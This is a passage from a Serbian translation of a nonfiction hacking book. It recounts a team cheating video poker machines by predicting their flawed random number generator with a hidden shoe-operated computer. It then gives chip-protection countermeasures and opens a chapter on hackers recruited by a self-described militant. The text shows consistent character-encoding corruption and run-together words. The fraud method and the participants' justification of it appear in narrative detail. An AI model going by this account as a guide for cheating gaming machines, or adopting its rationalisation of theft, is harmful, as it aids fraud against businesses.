brojeva mnogo sloæeniji: aparat je koristio dva generatora koji su sekombinovali, umesto samo jednog. “Programeri su bili mnogo svesnijimoguñnosti upada hakera”, zakàuåio je Aleks.
Ali i ovde su åetvorica otkrila bitnu greãku projektanata. “Verovatnosu na papiru proåitali da se nasumiånost poveñava ako dodate drugi re-gistar, ali to su uradili pogreãno.” Da bi se odredila bilo koja karta, brojiz prvog generatora sluåajnih brojeva sabiran je s brojem iz drugog.
Da bi ovo ispravno funkcionisalo, drugi generator bi morao da“kruæi” – tj. da meça svoju vrednost – nakon deàeça svake karte. Pro-jektanti to nisu uradili; programirali su drugi registar da kruæi na poået-ku svakog deàeça, pa se za svaku kartu u jednom deàeçu rezultatuprvog registra dodaje isti broj.
Koriãñeçe dva registra bio je izazov za Aleksa – “zadatak iz kriptolo-gije”. Liåilo mu je na korake koji su se ranije koristili u ãifrovaçu poru-ka. Mada je znao poneãto o toj temi, to nije bilo dovoàno da pronaœereãeçe, pa je poåeo da putuje do obiliæeçe univerzitetske biblioteke iistraæuje.
Da su projektanti paæàivije proåitali neke kçige o sistemimaãifrovaça, ne bi napravili ovu greãku. Takoœe, trebalo je dabudu metodiåniji prilikom testiraça sistema da bi ga razbilionako kako smo ga mi razbili.
Svaki student koji je diplomirao raåunarske nauke verovatnobi mogao da napiãe kôd koji bi radio ono ãto smo mi pokuãa-vali da uradimo, åim biste mu rekli ãta se traæi. Najãkakàivijideo odnosio se na pronalaæeçe algoritama koji bi brzo obavilipretragu i u roku od nekoliko sekundi rekli ãta se deãava. Akobiste to naivno uradili, pronalaæeçe reãeça moglo bi trajatinekoliko sati.
Mi smo priliåno dobri programeri, i svi i daàe zaraœujemo odtog posla, pa smo doãli do nekih vrlo maãtovitih optimizacija.Ipak, ne bih to nazvao trivijalnostima.
Señam se sliåne greãke koju je napravio programer kompanije Norton(pre nego ãto ga je Symantec kupio) radeñi na çihovom proizvodu Dis-kreet, programu koji je korisniku omoguñavao da pravi ãifrovane virtuel-ne ureœaje. On je pogreãno ugradio algoritam – a moæda je to uradio i
14
Um
eñe
pro
vale
namerno – pa je prostor za kàuå ãifre smaçen sa 56 bitova na 30. Åak iu to vreme, bilo je moguñe “na silu” pogoditi 30-bitni kàuå. Svako ko jekoristio ovaj proizvod neosnovano se oseñao bezbednim: napadaå jemogao da otkrije kàuå u razumnom vremenskom periodu i doœe dopodataka. Tim je otkrio istu vrstu greãke u programskom kodu aparata.
Dok su radili na raåunarskom programu koji bi im omoguñio da do-biju na novoj ciànoj maãini, momci su pritiskali i Aleksa da osmisli pri-stup koji neñe zahtevati da tråe do govornice. Inspiraciju za reãeçepronaãli su na stranama kçige
Eudaemonic Pie
: “nosivi” raåunar. Aleksje izumeo sistem saåiçen od minijaturnog kompjutera, napravàenogoko male mikroprocesorske ploåe koju su Majk i Marko pronaãli u ka-talogu. Uz çu je iãlo i kontrolno dugme koje je moglo stati u cipelu, ibeãumni vibrator poput onih iz danaãçih mobilnih telefona. Sistem suzvali svojim “dæepnim kompjuterom”.
“Morali smo da smislimo kako da ga napravimo na malom åipu smalom memorijom”, priåa Aleks. “Napravili smo fin hardver, pa je svemoglo da stane u cipelu i bilo je ergonomskog oblika.” (“Ergonomski”je u ovom sluåaju znaåilo da je ureœaj bio dovoàno mali da moæete ho-dati bez hramaça!)
Novi napad
Tim je poåeo da isprobava novu ãemu, a to je priliåno uticalo na çiho-ve æivce. Naravno, viãe nije bilo sumçivog tråkaça do govornice presvakog osvajaça novca. Ali, i pored svih generalnih proba u çihovoj“kancelariji”, premijera je bilo izvoœeçe pred priliåno velikom publi-kom uvek sumçiåavih àudi iz obezbeœeça.
Ovaj put program je napravàen tako da duæe mogu da sede za jed-nim aparatom, osvajajuñi viãe maçih, i maçe sumçivih svota. Aleks iMajk se priseñaju napetosti dok opisuju kako je sistem radio.
Aleks:
Obiåno bih raåunar stavàao u dæep, u neãto ãto je liåilona mali tranzistorski radio. Sproveo bih æicu od raåunara uåarapu i u prekidaå koji se nalazio u cipeli.
Majk:
Ja sam svoj lepio za ålanak. Prekidaåe smo napravili odkomadiña ploåe za konstruisaçe modela elektronskih kola(engl.
breadboard
). Komadi su bili kvadratiñi strane oko jedan
15
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
inå, s minijaturnim dugmetom. Zaãili smo i paråe lastiãa kojeñe iñi oko palca. Onda iseåete rupu u uloãku Dr. Sholl da biureœaj stojao mirno u cipeli. Bilo je neudobno samo ako ste ganosili ceo dan – tada je postajalo pravo muåeçe.
Aleks:
I onda uœete u kazino i pokuãavate da izgledate smi-reno, ponaãate se kao da nema niåega, kao da vam pantalonenisu pune æica. Odete tamo i poånete da igrate. Imali smoãifru, kao Morzeova azbuka. Ubacite pare i napravite neãtokredita da ne biste morali stalno da ubacujete novåiñe, i poå-nete da igrate. Oznake za podeàene karte unesete pritiskajuñidugme u cipeli.
Signal od dugmeta u cipeli odlazi do raåunara u dæepu panta-lona. Za ranije maãine trebalo je sedam ili osam karata dabiste sinhronizovali raåunar. Aparat podeli pet karata,povuåete joã tri, ãto je uobiåajena stvar. Na primer, zadræitepar, a zamenite ostale tri, i dobijete osam karata.
Majk:
Kôd koji ste ukucavali preko dugmeta u cipeli bio jebinaran i koristio je tehniku komprimovaça sliånu onome ãtose naziva Hafmanov kôd. Tako je dug pa kratak pritisakoznaåavao jedan-nula, ãto je binarna oznaka za dva. Dvaduga pritiska bila su jedan-jedan, binarna oznaka za tri, itd.Ni za jednu kartu nam nije trebalo viãe od tri pritiska.
Aleks:
Ako ste dugme dræali pritisnuto tri sekunde, to je zna-åilo otkazivaçe. I [raåunar] se odazivao – na primer, dup-dup-dup je znaåilo “OK, spreman sam za unos”. Unoãeçepodataka smo veæbali – morali smo da se koncentriãemo iuåimo kako se to radi. Nakon nekog vremena, mogli smo daukucavamo i dok smo razgovarali sa osobàem u kazinu.
Poãto bih uneo kôd i identifikovao oko osam karata, to je bilodovoàno za sinhronizovaçe sa oko 99 procenata sigurnosti.Otprilike u roku od nekoliko sekundi do minut, raåunar bitriput zazujao.
Spreman sam za akciju.
16
Um
eñe
pro
vale
Raåunar u dæepu pronaãao je mesto u algoritmu koje predstavàa upra-vo podeàene karte. Poãto je çegov algoritam bio isti kao onaj u video po-ker aparatu, za svako novo deàeçe raåunar je “znao” kojih pet dodatnihkarata åeka nakon ãto igraå izabere karte koje ñe odbaciti, i signalizirao jekoje karte treba zadræati da bi se osvojio dobitak. Aleks je nastavio:
Raåunar vam javàa ãta da uradite tako ãto ãaàe signale vibra-toru u vaãem dæepu. Vibratore smo nabavili besplatno tako ãtosmo ih iãåupali iz starih pejdæera. Ako treba da zadræite treñui petu kartu, kompjuter bi se oglasio sa bip, bip, biiip, bip,biiip, ãto ste oseñali kao vibracije u svom dæepu.
Izraåunali smo da, ako igramo paæàivo, imamo izmeœu 20 i40 procenata dobiti, ãto znaåi prednost od 40 procenata u sva-kom deàeçu. To je odliåno – najboài svetski igraåi blek dæekaostvare oko dva i po procenta.
Ako sedite za aparatom u koji se ubacuje 5 dolara i odjednomubacujete po pet kovanica, dvaput u minutu, moæete zaraditi25 dolara za minut. Za pola sata mogli biste lako zaraditi1.000 dolara. Svaki dan se nekome tako posreñi. Oko 5 pro-cenata igraåa koji sede i igraju pola sata mogli bi postiñi toliko.Ali to im se ne deãava svaki put. Mi smo bili u tih 5 procenatakad god bismo seli.
Svaki put kada bi neko od çih osvojio veñu sumu u jednom kazinu,preãao bi u drugi. Obiåno su uzimali po åetiri ili pet dobitaka zaredom.Kada bi se posle mesec dana vratili u taj kazino, posetili bi ga u drugodoba dana da bi zatekli drugu smenu osobàa, àude koji ih neñe prepo-znati. Poåeli su da poseñuju i kazina u drugim gradovima – Rinou, At-lantik Sitiju itd.
Putovaça, kockaçe i osvajaçe, postepeno su postali rutina. Meœu-tim, jednom prilikom Majk je mislio da je doãao trenutak od kog su svistrepeli. Upravo se naoãtrio i prvi put je igrao na aparatu u koji se uba-cuje 25 dolara, ãto je poveñavalo napetost – ãto je vrednost maãine veña,to vas paæàivije posmatraju.
Bio sam pomalo nervozan, ali stvari su iãle boàe nego ãto samoåekivao. Osvojio sam oko 5.000 dolara za relativno kratkovreme. A onda me je jedan ogroman tip potapãao po ramenu.
17
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
Pogledao sam ga oseñajuñi blagu muåninu u stomaku. Pomi-slio sam: “To je to”.
“Primetio sam da veñ neko vreme igrate”, rekao je. “Æelite liroze ili zelenu?”
Da sam to bio ja, zapitao bih se: “Ãta – da izaberem boju koje æelimda budem kada me prebiju na mrtvo ime?” Mislim da bih ostavio savsvoj novac i pokuãao da zbriãem. Majk kaæe da je veñ bio dovoàno is-kusan da ostane smiren.
Åovek je rekao: “Æelimo da vam poklonimo ãoàu za kafu.”
Majk je odabrao zelenu.Marko je imao sopstveni napet momenat. Åekao je na dobitno
deàeçe kada mu je priãao nadzornik kog nije primetio. “Udvostruåili stesumu na pet hiàada dolara – baã imate sreñe”, rekao je iznenaœeno. Starijagospoœa za susednim aparatom progovorila je hrapavim glasom puãaåa:“Nije to... bila... sreña.” Nadzornik se ukoåio, i postao sumçiåav. “To jebila
petàa
”, zagraktala je. Nadzornik se nasmeãio i otiãao daàe.Tokom oko tri godine, momci su naizmeniåno obavàali legalne
poslove savetovaça kako bi oåuvali svoje veãtine i kontakte, i povreme-no punili dæepove za poker aparatima. Kupili su joã dva aparata, ukàu-åujuñi i najviãe koriãñen model video pokera i nastavili da poboàãavajusvoj softver.
Na putovaçima je svaki od tri ålana tima iãao u razliåit kazino, nisuiãli “u åoporu”, priåao je Aleks. “Tako smo otiãli samo jednom ili dvaput,ali to je bilo glupo.” Iako su se dogovorili da ñe jedan drugom javàati ãtanameravaju, povremeno bi se neko od çih iskrao u kockarske gradove neprijavàujuñi ostalima. Igrali su samo u kazinima, nikad na mestima kaoãto su dragstori ili supermarketi, jer su tamo “dobici uglavnom vrlo mali”.
Uhvañen!
Aleks i Majk su se trudili da se disciplinovano dræe “odreœenih pravilakoja ñe sigurno smaçiti verovatnoñu da nas primete. Na primer, pazilismo da nikada ne uzimamo previãe novca na istom mestu, da na istommestu nikada ne osvajamo novac previãe åesto, da ne uzimamo novacmnogo dana zaredom.”
18
Um
eñe
pro
vale
Ali Majk je tu disciplinu shvatao ozbiànije i smatrao je da drugadvojica nisu dovoàno oprezni. Viãe je voleo da osvaja neãto maçe nov-ca na sat, ali da izgleda kao i drugi tipiåni igraåi. Ako bi deàeçem do-bio dva keca, a kompjuter mu rekao da odbaci jednog ili oba keca da bidobio joã boàe karte – na primer tri æandara – on to nije radio. U svimkazinima postoje kamere kojima upravàa obezbeœeçe smeãteno iznaddvorane za kockaçe. One se mogu okretati, fokusirati i zumirati u po-trazi za prevarantima, podmiñenim sluæbenicima kazina i drugima kojinisu uspeli da odole tolikom novcu. Ako bi se desilo da neko iz obez-beœeça viri u Majkov aparat, odmah bi znao da tu nisu åista posla – ni-jedan razuman igraå ne bi odbacio par keåeva. Niko ko ne vara ne bipomislio da slede joã boàe karte.
Aleks nije imao tako visoke standarde. Markovi su bili joã niæi.“Marko je bio priliåno drzak” po Aleksovom miãàeçu:
On je vrlo pametan tip, samouk, nikada nije zavrãio sredçuãkolu, ali je bio jedan od onih sjajnih Istoånoevropàana. I bioje vrlo uoåàiv.
Znao je sve o raåunarima, ali je umislio da su àudi zaposleniu kazinima glupi. Nije bilo teãko pomisliti tako neãto s obzi-rom na to da smo uspevali da im izvuåemo toliki novac. Paipak, åini mi se da je postao previãe samouveren.
Previãe se osilio, a nije se ni uklapao u profil tipiånog igraåa jerje izgledao kao klinac iz inostranstva. Mislim da je zato budiosumçe. Takoœe, nije iãao sa devojkom ili suprugom, koja bipomogla da se boàe uklopi.
Mislim da je na kraju poåeo da radi stvari koje su privlaåilepaæçu. Takoœe, kako je vreme prolazilo, svi smo se okuraæili,pa smo poåeli da igramo na skupàim aparatima koji su davaliboàe dobitke, ãto je operaciju åinilo riziånijom.
Iako se Majk s tim ne slaæe, Aleks je nagovestio da su sva trojica volelida rizikuju i da su stalno pomerali granice proveravajuñi koliko dalekomogu da idu. O tome je rekao: “Jednostavno, stalno poveñavate rizik.”
Doãao je dan kada je Marko u jednom trenutku sedeo za aparatom ukazinu, a u sledeñem je bio okruæen gomilom àudi iz obezbeœeça kojisu ga vukli i gurali u zadçu sobu za razgovor. Aleks je prepriåao dogaœaj.
19
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
Bilo je straãno jer ste stalno sluãali priåe o tim tipovima kojimlate àude kao volove u kupusu. Oni su bili åuveni po geslu“J_ã policiju, sami ñemo se postarati za ovo.”
Marko je bio uplaãen, ali on je vrlo åvrst lik. Na neki naåin mije drago ãto je baã on uhvañen, ako je iko od nas morao dapadne, jer mislim da je on bio najsposobniji da se izbori s tomsituacijom. Koliko znam, sliåne stvari je preæiveo u IstoånojEvropi.
Pokazao je lojalnost i nije nas izdao. Nije pomiçao partnereniti bilo ãta sliåno. Bio je nervozan i uznemiren, ali je ostaoåvrst pred paàbom i rekao im je da je radio sam.
Rekao je: “Åekajte, da li sam ja uhapãen, jeste li vi policija, uåemu je stvar?”
Bilo je to ispitivaçe kao u kriminalistiåkoj sluæbi, osim ãto tiàudi nisu bili policija i nisu imali nikakav stvaran autoritet,ãto je pomalo åudno. Nastavili su da ga ispituju, ali ga nisustvarno maltretirali.
Snimili su mu anfas i profil, i oduzeli mu kompjuter i sav novac kojije imao – oko 7.000 dolara u keãu. Nakon oko jednog sata ispitivaça,ili moæda duæe – bio je previãe uzrujan da bi bio siguran koliko je trajalo– pustili su ga.
Marko je pozvao svoje partnere na putu kuñi. Zvuåao je izbezumàe-no. Rekao je: “Da vam ispriåam ãta se desilo. Zeznuo sam stvar.”
Majk je odmah otiãao u çihov ãtab. “Aleks i ja smo ãiznuli kada smoåuli ãta se desilo. Ja sam poåeo da rastavàam aparate i bacam delovesvud po gradu.”
Aleks i Majk su bili àuti ãto je Marko nepotrebno rizikovao. Nijehteo da postavàa dugme u cipelu kao çih dvojica, tvrdoglavo insistra-juñi da ureœaj nosi u dæepu jakne i pokreñe ga rukom. Aleks je opisaoMarka kao tipa koji je “mislio da su àudi iz obezbeœeça toliko glupi daje mogao pod çihovim nosem da bude sve drskiji.”
Aleks je ubeœen da zna ãta se desilo, iako nije bio prisutan. (Zapravo,çih trojica nisu znali da je Marko otiãao u kazino, uprkos dogovoru dase meœusobno obaveãtavaju o planovima.) Po Aleksovom miãàeçu,
20
Um
eñe
pro
vale
“Videli su da on osvaja nemoguñe sume i da se neãto åudno deãava sçegovom rukom.” Marko prosto nije brinuo o tome ãta bi moglo skre-nuti paæçu osobàa i pobuditi sumçu.
To je bio kraj i za Aleksa, mada nije skroz siguran da su i ostali pre-stali da varaju. “Na poåetku smo odluåili da, ako iko od nas bude uh-vañen, svi prestajemo.” Rekao je: “Koliko ja znam, svi smo se togapridræavali.” Ubrzo zatim je, maçe siguran, dodao: “Bar ja jesam.”Majk se sloæio, ali nijedan od çih nikada to pitaçe nije direktno posta-vio Marku.
Kazina obiåno ne tuæe napadaåe poput çih åetvorice. “Razlog za toje ãto ne æele da objave da imaju ovakve slabosti”, objaãçava Aleks.Obiåno se zavrãava reåima: “Izgubi se pre zalaska sunca. Pustiñemo teako obeñaã da viãe nikada neñeã kroåiti u ovaj kazino.”
Epilog
Oko ãest meseci kasnije, Marko je primio pismo u kom je pisalo da pro-tiv çega neñe biti podneta tuæba.
Njih åetvorica su i daàe prijateài, mada danas nisu toliko bliski.Aleks misli da je u ovoj avanturi zaradio oko 300.000 dolara, a deo tognovca otiãao je Lariju, kao ãto su se dogovorili. Tri partnera koja su iãlau kazina i preuzela sav rizik, prvo su se dogovorila da ñe podeliti novacna jednake delove, ali Aleks misli da su Majk i Marko verovatno uzelioko 400.000 do pola miliona dolara svaki. Majk nije potvrdio da je do-bio viãe od 300.000 dolara, ali priznaje da je Aleks verovatno izvukaomaçe od çega.
Radili su oko tri godine. Uprkos novcu, Aleks je bio sreñan kada jebilo gotovo: “Na neki naåin, osetio sam olakãaçe. Sva zabava je iãåezla.To nam je postalo kao posao. I to riziåan.” Ni Majku nije bilo krivo ãtose sve zavrãilo, i blago se æalio da je “postalo nekako naporno”.
Obojica su na poåetku oklevali da ispriåaju svoju priåu, ali su sa uæi-vaçem prihvatili zadatak. A zaãto i ne bi – tokom desetak godina otkakose sve desilo, nijedan od çih åetvorice nikada nikome nije ni proãaputaoo tim dogaœajima osim suprugama i devojci, koje su bile deo cele stvari.Na neki naåin, bilo je olakãaçe ispriåati sve po prvi put, pod zaãtitomdogovora o potpunoj anonimnosti. Oåigledno su uæivali u otkrivaçudetaàa, a Majk je priznao: “To je bila jedna od najuzbudàivijih stvarikoje sam ikada uåinio.”
21
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
Aleks verovatno govori u ime svih iznoseñi svoj stav o ovoj ludoriji:
Ne oseñam se nimalo loãe zbog novca koji smo uzeli. To je samokap u moru novca u toj industriji. Da budem iskren, nikadanismo oseñali griæu savesti, jer su to kazina.
Sve smo lako racionalizovali. Krali smo od kazina koji su kralistarim gospoœama nudeñi igre u kojima ne mogu da dobiju.Vegas je kao mesto u kom su àudi utaknuti u maãine zaisisavaçe novca, i one im isisavaju æivot – novåiñ po novåiñ.Oseñali smo se kao da se svetimo Velikom Bratu, a ne kao danekoj jadnoj starici otimamo dæek pot.
Napravili su igru u kojoj se kaæe “Izaberi odgovarajuñe karte idobiñeã novac”. Mi smo birali odgovarajuñe karte. Jedino ãtooni nisu oåekivali da to ikome poœe za rukom.
Aleks kaæe da tako neãto danas ne bi pokuãao. Meœutim, çegovi ra-zlozi ñe vas moæda iznenaditi: “Pronaãao sam druge naåine da doœemdo novca. Da je moja finansijska situacija ista kao tada, verovatno bihpokuãao opet.” Misli da je ono ãto su uradili sasvim opravdano.
U ovoj igri maåke i miãa, maåka stalno uåi nove trikove koje miã iz-vodi i preduzima odgovarajuñe mere. Slot maãine danas koriste mnogoboài softver, pa momci nisu sigurni da li bi uspeli ponovo da ih provale.
Ipak, nikada neñe postojati savrãeno reãeçe za bilo koje pitaçe teh-noloãke bezbednosti. Aleks je taj problem slikovito predstavio: “Svakiput kada neki [programer] kaæe: ’Niko se neñe muåiti oko toga‘, naœe seklinac u Finskoj raspoloæen da se pomuåi.”
I to ne samo u Finskoj, nego i u Americi.
SAÆETAK
Tokom devedesetih, kazina i projektanti kockarskih aparata nisu shva-tali neke stvari koje su kasnije postale oåigledne. Generator pseudo-sluåajnih brojeva ne generiãe zaista nasumiåne brojeve. Umesto toga, onskladiãti listu nasumiåno poreœanih brojeva. U ovom sluåaju, to je ve-oma duga lista: sa stepenom od 2 do 32, ili otprilike milijardu brojeva.Na poåetku ciklusa, program nasumiåno bira mesto u listi. Ali nakontoga, sve dok ne poåne nov ciklus igre, on koristi sledeñe brojeve sa liste,jedan za drugim.
22
Um
eñe
pro
vale
Reverznim inæeçeringom (tj. povratnom analizom) softvera momcisu doãli do liste. Sa bilo koje poznate taåke u “nasumiånoj” listi, oni sumogli da utvrde sledeñi broj na listi, a pomoñu dodatnog poznavaçabrzine ponavàaça za konkretnu maãinu, mogli su da odrede koliko ñeminuta i sekundi proñi pre nego ãto aparat prikaæe fleã rojal.
PROTIVMERE
Proizvoœaåi svakog proizvoda koji koristi ROM åipove i softver morajupredvideti bezbednosne probleme. A svaka kompanija koja koristi pro-izvode zasnovane na softveru i raåunarima – ãto danas znaåi gotovo sva-ka kompanija, sve do radçi s jednim åovekom – biñe u opasnosti akopretpostavi da su tvorci sistema razmiãàali o svim çegovim slabostima.Programeri softvera u japanskim slot aparatima napravili su greãku jernisu razmiãàali mnogo unapred o svim vrstama napada koji bi moglibiti izvedeni. Nisu preduzeli nikakve mere bezbednosti kojima bispreåili àude da doœu do firmvera. Trebalo je da predvide da ñe nekodoñi do aparata, ukloniti ROM åip, proåitati firmver i doñi do pro-gramskih instrukcija koje aparatu govore kako da radi. Åak i ako su raz-motrili tu moguñnost, verovatno su pretpostavili da sâmo poznavaçenaåina rada maãine nije dovoàno, i smatrali da ñe sloæenost izraåuna-vaça potrebnih za provaàivaçe generatora sluåajnih brojeva osuditisvaki takav pokuãaj na neuspeh. To je danas moæda i taåno, ali u onovreme nije bilo.
Recimo da vaãa kompanija prodaje hardverske proizvode koji sadræekompjuterske åipove. Ãta treba da uradite da biste obezbedili adekvatnuzaãtitu protiv suparnika koji hoñe da zaviri u vaã softver, protiv stranekompanije koja hoñe da napravi jeftinu kopiju, ili hakera koji hoñe davas prevari?
Prvi korak: oteæajte dolazak do firmvera. Za to postoji nekolikonaåina, ukàuåujuñi sledeñe:
� Kupujte åipove koji su napravàeni tako da su osigurani odnapada. Nekoliko kompanija prodaje åipove dizajnirane speci-jalno za situacije kada postoji velika opasnost od napada.
� Koristite pakovaçe “chip on-board” – dizajn u kom je åipugraœen u ploåu sa elektronskim kolima i ne moæe se izdvojitikao poseban element.
23
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
� Zapeåatite åip epoksidnom smolom, pa ñe se slomiti ako nekopokuãa da ga ukloni s ploåe. Da biste poboàãali ovu tehniku, usmolu dodajte aluminijumski prah. Ukoliko napadaå pokuãa daukloni åip zagrevaçem smole, aluminijum ñe ga uniãtiti.
� Koristite dizajn “Ball Grid Array” (BGA). U takvom rasporedukonektori ne izlaze iz bokova åipa, veñ ispod çega, pa je teãko,åak i nemoguñe, uhvatiti tok signala iz åipa dok je on postavàenna ploåu.
Joã jedna protivmera je uklaçaçe svih oznaka sa åipa. Time ñete na-padaåa liãiti informacija o proizvoœaåu i vrsti åipa.
Priliåno uobiåajen postupak, koji su koristili proizvoœaåi aparata izove priåe, zahteva koriãñeçe kontrolnih zbirova (“heãiraçe”) – ukàuåi-vaçe rutine check-sum u softver. Ukoliko se program izmeni, kontrol-ni zbir neñe biti ispravan i softver neñe pokrenuti ureœaj. Meœutim,umeãniji hakeri koji su upoznati sa ovim pristupom, jednostavnopregledaju softver da bi videli postoji li u çemu rutina check-sum, i is-kàuåe je ukoliko je pronaœu. Znaåi, mnogo je boàe da iskoristite jednuili viãe metoda fiziåke zaãtite åipa.
ZAKLJUÅAKUkoliko je vaã firmver privatan i vredan, pregledajte najboàe izvorepodataka o bezbednosti i otkrijte koje tehnike hakeri trenutno koriste.Prenosite najnovije informacije svojim projektantima i programerima.I obavezno preduzmite sve odgovarajuñe korake da biste postigli najviãinivo bezbednosti srazmeran troãkovima koje biste mogli imati zbogupada.
25
Poglavlje 2
Kad teroristi pozovu
Ne znam zaãto sam nastavio s tim. Zbog opsesivne prirode? Æeœiza novcem? Æudçe za moñi? Mogao bih nabrojati mnogo razloga.
– ne0h
vadesetogodiãçi haker koji se potpisuje kao Comrade (Drug)ovih dana provodi vreme u kuñi u finom kraju Majamija, kojapripada çemu i çegovom bratu. Otac æivi s çima, ali samo
zato ãto je brat joã uvek maloletan, a Sluæba za brigu o deci zahteva daodrasla osoba æivi u kuñi dok deåak ne napuni 18. Brañi to ne smeta, atata ima svoj stan na drugom mestu, i preseliñe se u çega kad za todoœe vreme.
Comradeova mama je umrla pre dve godine i ostavila kuñu sinovimajer su ona i çihov otac bili razvedeni. Ostavila im je i neãto gotovine.Njegov brat ide u sredçu ãkolu, a Comrade “samo visi po kraju”. Veñideo porodice to ne odobrava, ali on kaæe da ga “uopãte nije briga”. Kadavrlo mladi dospete u zatvor – zapravo, ako ste najmlaœa osoba koja jeikada osuœena kao haker na osnovu federalne optuænice – iskustvo ñeverovatno promeniti vaã sistem vrednosti.
Naravno, hakerisaçe ne poznaje meœunarodne granice, pa nije åud-no ãto je Comradeov prijateà haker, ne0h (nio), otprilike 4.500 km da-leko. Hakerisaçe ih je zbliæilo i skrenulo ih na stranputicu koja je,ispostavilo se, vodila sluæeçu interesima meœunarodnog terorizma pre-ko upada u veoma osetàive raåunarske sisteme. Danas nije lako nositi ses tim teretom.
D
26
Um
eñe
pro
vale
Godinu dana stariji od Comradea, ne0h kaæe: “Koristio sam raåu-nare otkad sam mogao da dohvatim tastaturu”. Njegov otac je imaoprodavnicu raåunarske opreme i vodio je deåaka sa sobom na sastanke sklijentima. Deåak je sedeo na oåevom krilu tokom prodaje. Do svoje je-danaeste godine veñ je pisao dBase kôd za potrebe oåevog posla.
U meœuvremenu, ne0h je naiãao na kopiju kçige
Takedown
(Hyperi-on Press, 1996) – veoma netaåan opis mojih hakerskih akcija, moje trigodine u bekstvu, i potrage FBI-ja za mnom. ne0h je bio oåaran kçigom:
Inspirisao si me. Ti si bio moj j_ni mentor. Proåitao sam sve oonome ãto si radio. Hteo sam da postanem slavan kao ti.
To ga je motivisalo da postane haker. Svoju sobu je opremio raåu-narima, razvodnicima za umreæavaçe, gusarskom zastavom dugom dvametra i – krenuo mojim stopama.
ne0h je poåeo da stiåe solidno hakersko znaçe i sposobnosti. Prvo jestekao veãtine, a diskrecija je doãla kasnije. Koristeñi hakerski termin zaklince poåetnike, objasnio je: “Dok sam pisao deåje skriptove, meçaosam matiåne strane Web prezentacija i ostavàao svoju adresu e-poãte.”
Visio je na IRC prezentacijama (engl.
Internet Relay Chat
, interaktivnirazgovor na Internetu) – elektronskim priåaonicama u kojima se sreñuàudi sa zajedniåkim interesovaçima i u realnom vremenu razmeçujuporuke o pecaçu, starim avionima, kuñnim pivarama, ili bilo kojoj odhiàada drugih tema, ukàuåujuñi i hakerisaçe. Kada na IRC prezentacijiunesete tekst, svi koji su u to vreme na mreæi videñe ãta ste napisali imogu vam odgovoriti. Mada to mnogi redovni korisnici IRC-a ne znaju,komunikacija se lako moæe evidentirati. Te evidencije dosad verovatnosadræe skoro isti broj reåi kao sve kçige u Kongresnoj biblioteci – a doteksta upisanog u æurbi, bez previãe razmiãàaça o posledicama, moæe sedoñi godinama kasnije.
Comrade i ne0h su provodili vreme na nekoliko istih IRC prezentaci-ja i tako se rodilo prijateàstvo na daàinu. Hakeri se åesto udruæuju radirazmeçivaça informacija ili izvoœeça grupnih napada. ne0h, Comradei joã jedan klinac odluåili su da naprave sopstvenu grupu koju su nazvali“Keebler Elves”. Joã nekoliko hakera je imalo pristup razgovorima grupe,ali tri prva ålana nisu ostalima govorili o svojim napadima. “Provaàivalismo u vladine prezentacije radi zabave”, rekao je Comrade. Proceçujeda su provalili u “par stotina” navodno zaãtiñenih vladinih prezentacija.
27
Poglavlje 2
: Kad
teroristi p
ozo
vu
Razliåite grupe hakera okupàaju se na nekoliko IRC kanala. Meœuçima se izdvaja mreæa Efnet. To je prezentacija koju Comrade opisujekao “ne baã kompjutersko podzemàe – to je priliåno velika grupa serve-ra”. Ali, na Efnetu je bilo nekih maçe poznatih kanala, mesta koja nistemogli sami da pronaœete, veñ je za çih morao da vam kaæe drugi hakeråije ste povereçe zadobili. Ti kanali su, kaæe Comrade, bili “priliånoilegalni”.
Terorista Kalid baca mamac
Oko 1998, na tim “priliåno ilegalnim” kanalima, Comrade je poåeo danailazi na razgovore o tipu koji se “motao unaokolo”, a predstavàao sekao RahulB. (Kasnije je koristio i identifikaciju Rama3456). “Svima jebilo poznato da je on traæio hakere koji ñe upadati u vladine i vojne ra-åunare – prezentacije .gov i .mil”, kaæe Comrade. “Kruæile su glasine daje on radio za Bin Ladena. To je bilo pre 11. septembra, pa Bin Ladennije bilo ime koje ste mogli svaki dan åuti u vestima.”
Na kraju su se Comradeovi putevi ukrstili s putevima tajanstvenog åo-veka koji ñe mu se predstaviti kao Kalid Ibrahim. “Razgovarao sam s çimnekoliko minuta [na IRC-u] i jednom smo priåali telefonom.” Åovek jeimao strani akcenat i “definitivno je zvuåalo kao da zove iz inostranstva”.
I ne0h je stupio s çim u vezu. Kalid je s çim bio direktniji i otvo-reniji.
Oko 1999, sa mnom je putem e-poãte u kontakt stupio åovekkoji je rekao da je militantni aktivista i da se nalazi u Pakista-nu. Predstavio se kao Kalid Ibrahim. Rekao mi je da je radioza pakistanske militantne grupe.
Da li bi neko u potrazi za naivnim klincima hakerima zaista sebe obe-leæio kao teroristu – åak i pre 11. septembra? Na prvi pogled to zvuåiapsurdno. Taj åovek je kasnije tvrdio da je iãao u ãkolu u SAD, da se isâm pomalo bavio hakerisaçem, i da se povezao s hakerima dok je bio uAmerici. U tom sluåaju, on je mogao znati, ili je mislio da zna, kako ha-keri razmiãàaju. Svaki haker je do neke mere buntovnik koji æivi porazliåitim standardima i uæiva u savladavaçu sistema. Ako hoñete da pri-vuåete hakera, moæda i nije tako glupo objaviti da i sami krãite pravila ida ste autsajder. Moæda bi priåa upravo tako postala uveràivija, a poten-cijalni sauåesnici maçe oprezni i sumçiåavi.
28
Um
eñe
pro
vale
A bilo je tu i novca. ne0h je od Kalida dobio ponudu od 1.000 dolarada upadne u raåunarske mreæe jednog kineskog univerziteta – mestokoje ne0h naziva “kineski MIT” (MIT – Tehnoloãki institut Masaåuset-sa) – i iz baze nabavi podatke o studentima. Pretpostavio je da je to test iza çegove hakerske sposobnosti i za çegovu genijalnost: kako da upad-nete u raåunarski sistem kada ne umete da åitate jezik? I joã teæe: kako dase laæno predstavite kada ne govorite jezik?
